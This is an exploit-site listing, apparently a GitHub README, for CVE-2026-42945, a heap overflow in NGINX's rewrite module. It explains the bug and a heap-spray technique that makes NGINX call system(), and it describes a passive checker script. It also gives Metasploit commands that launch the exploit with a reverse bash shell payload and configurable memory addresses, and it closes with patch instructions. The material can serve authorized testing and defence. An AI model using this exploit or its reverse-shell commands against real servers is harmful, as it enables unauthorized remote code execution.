Exploit for CVE-2026-42945

Name: Exploit for CVE-2026-42945
Rating: 5 (70 reviews)
2026-06-15 | CVSS 9.2
## https://sploitus.com/exploit?id=90F0A8EE-51A7-5AC2-8C97-EEBEED5A9E9B
# CVE-2026-42945 — NGINX Rift

Critical heap buffer overflow in NGINX's `ngx_http_rewrite_module`, present since **2008** (version 0.6.27).  
Allows **unauthenticated RCE** via a specially crafted HTTP request.

> **CVSS:** 9.2 (Critical)  
> **Disclosure:** 2026-05-13  
> **Actively exploited in the wild** as of 2026-05-16

---

## The Bug

NGINX's rewrite engine uses a two-pass approach: first **calculate** the required buffer size, then **copy** data into it.

The `is_args` flag is set on the main engine when a `rewrite` replacement contains `?`, but the length-calculation pass runs on a freshly zeroed sub-engine:

- **Size pass** — sees `is_args = 0` → returns raw capture length
- **Copy pass** — sees `is_args = 1` → calls `ngx_escape_uri` with `NGX_ESCAPE_ARGS`, expanding each escapable byte to **3 bytes**

The copy overflows the undersized heap buffer with attacker-controlled URI data.

Exploitation uses **cross-request heap feng shui**: POST-body spray requests fill the heap with a fake `ngx_pool_cleanup_s {handler=system(), data=&cmd}`. The crafted GET overflow then overwrites the adjacent `ngx_pool_t` cleanup pointer. When NGINX recycles the pool — `system(cmd)` fires.

---

## Affected Versions

| Product | Affected | Fixed |
|---------|----------|-------|
| NGINX Open Source | 0.6.27 – 1.30.0 | **1.30.1**, **1.31.0** |
| NGINX Plus | R32 – R36 | **R32 P6**, **R35 P2**, **R36 P4** |

---

## Contents

| File | Description |
|------|-------------|
| `check_cve_2026_42945.py` | Passive vulnerability checker — no exploitation, no crash risk |
| `nginx_rewrite_heap_bof_cve_2026_42945.rb` | Metasploit module with `check` command support |

---

## Checker

Safe, passive check — identifies vulnerable targets without crashing them.

```bash
# Single host
python3 check_cve_2026_42945.py 192.168.1.100

# Custom port and rewrite path
python3 check_cve_2026_42945.py 192.168.1.100 -p 8080 --path /app/

# Scan a list of targets (host:port per line)
python3 check_cve_2026_42945.py -f targets.txt
```

**Check logic:**

| Step | What it checks | Patched indicator |
|------|---------------|-------------------|
| 1 | `Server:` header banner | Not NGINX → skip |
| 2 | Version from banner | `>= 1.30.1` / `1.31.0` → safe |
| 3 | Rewrite probe (301/302 on test URI) | Confirms rewrite rules are active |
| 4 | Overflow-size probe (`349×A + 970×+`) | Patch → `414 URI Too Long`; unpatched → `400`/reset |

**Verdicts:** `LIKELY_VULNERABLE` / `POSSIBLY_VULNERABLE` / `NOT_VULNERABLE` / `UNKNOWN`

---

## Metasploit Module

```bash
cp nginx_rewrite_heap_bof_cve_2026_42945.rb ~/.msf4/modules/exploits/multi/http/
```

```
msf6 > reload_all
msf6 > use exploit/multi/http/nginx_rewrite_heap_bof_cve_2026_42945

# Passive check (no exploitation)
msf6 exploit(...) > set RHOSTS 192.168.1.100
msf6 exploit(...) > check

# Full exploit (requires ASLR disabled or known base addresses)
msf6 exploit(...) > set PAYLOAD cmd/unix/reverse_bash
msf6 exploit(...) > set LHOST 192.168.1.10
msf6 exploit(...) > set LPORT 4444
msf6 exploit(...) > run
```

**Options:**

| Option | Default | Description |
|--------|---------|-------------|
| `RHOSTS` | — | Target host(s) |
| `RPORT` | `80` | Target port |
| `TARGETURI` | `/api/` | URI with active rewrite rule |
| `SPRAY_URI` | `/spray` | URI for heap spray POST requests |
| `N_SPRAY` | `20` | Number of spray connections |
| `HEAP_BASE` | `0x555555659000` | Heap base (adjust for target) |
| `LIBC_BASE` | `0x7ffff77ba000` | libc base (adjust for target) |
| `SYSTEM_OFFSET` | `0x50d70` | `system()` offset in libc |

> **Note:** Default addresses match Ubuntu 24.04 + NGINX 1.28 + glibc 2.39 with ASLR disabled.  
> For ASLR-enabled targets, obtain base addresses via `/proc//maps` or an info-leak.

---

## Patch

Update NGINX immediately:

```bash
# Ubuntu/Debian
apt update && apt install nginx

# RHEL/CentOS
yum update nginx

# Verify
nginx -v  # must show >= 1.30.1 or >= 1.31.0
```

---

## References

- [Original PoC — DepthFirstDisclosures/Nginx-Rift](https://github.com/DepthFirstDisclosures/Nginx-Rift)
- [Technical write-up — depthfirst.com](https://depthfirst.com/research/nginx-rift-achieving-nginx-rce-via-an-18-year-old-vulnerability)
- [F5 Security Advisory K000160932](https://my.f5.com/manage/s/article/K000160932)
- [Help Net Security — active exploitation](https://www.helpnetsecurity.com/2026/05/18/ngnix-vulnerability-exploited-cve-2026-42945/)

---

**For authorized security testing and research only.**